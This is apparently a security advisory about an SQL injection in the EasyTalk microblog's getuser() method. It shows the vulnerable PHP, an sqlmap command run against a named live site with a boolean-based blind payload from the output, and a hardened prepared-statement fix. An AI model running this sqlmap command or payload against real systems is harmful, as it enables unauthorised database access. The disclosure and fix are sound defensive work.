EasyTalk open-source microblog system SQL injection

Published: 2025-04-13
Revised: 2025-04-13

### Brief description:

For developers, the real answer is to get the product's own security right, rather than relying on some so-called security product to defend it!

### Details:

Location: Home/Lib/Action/SpaceAction.class.php

Code snippet:

```php
// profile: fetch the user
public function getuser() {
    if ($this->my['user_name'] == $_GET['user_name']) {
        $user = $this->my;
    } else {
        // The $_GET['user_name'] parameter is not filtered. This $_GET[user_name]
        // is the user_name on the URL, t.nextsns.com/?user_name
        // It is interpolated directly into the WHERE clause string, so a crafted
        // value changes the query that is executed.
        $user = $this->uModel->where("user_name='$_GET[user_name]'")->find();
    }
    return $user;
}
```

Although a certain "number" vendor's defence system is built in, data can still be extracted through the injection!

```
python sqlmap.py -u "http://t.nextsns.com/?fate666888*" --batch --dbs --flush-session
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 375 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://t.nextsns.com:80/?fate666888' AND 7549=7549 AND 'etdJ'='etdJ

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload:...
```
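For comparison, a hardened version of `getuser()` as an added example (this is not EasyTalk's code): the value from the URL is allow-listed and then bound with a prepared statement instead of being concatenated into the `WHERE` string. It assumes a PDO connection `$pdo` and a `user` table with a `user_name` column; the table name and the `$my` array mirror the vulnerable snippet and are assumptions.

```php
<?php
// Added example, not EasyTalk's code. Assumes: a PDO handle $pdo, a table `user`
// with column `user_name` (assumed from the vulnerable snippet), and $my being the
// current user's row as in the original controller.

function getuser_safe(PDO $pdo, array $my, ?string $userName): ?array
{
    if ($userName === null) {
        return null;
    }
    // Allow-list first: treat user_name as a short identifier and reject anything
    // else (quotes, spaces, SQL fragments) before it reaches the database layer.
    if (!preg_match('/^[A-Za-z0-9_]{1,30}$/', $userName)) {
        return null;
    }
    // Strict comparison; the original used == on a raw $_GET value.
    if (isset($my['user_name']) && $my['user_name'] === $userName) {
        return $my;
    }
    // Prepared statement: the value is bound as data, never interpolated into the
    // query text, so a payload such as  fate666888' AND 7549=7549 AND 'etdJ'='etdJ
    // can only ever be compared as a literal string (and is rejected above anyway).
    $stmt = $pdo->prepare('SELECT * FROM `user` WHERE `user_name` = :user_name LIMIT 1');
    $stmt->bindValue(':user_name', $userName, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage mirroring the original controller flow (hypothetical call site):
// $user = getuser_safe($pdo, $this->my, $_GET['user_name'] ?? null);
```

With the parameter bound, both the boolean-based and the time-based blind probes shown in the sqlmap output above simply fail to match a user rather than altering the query.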
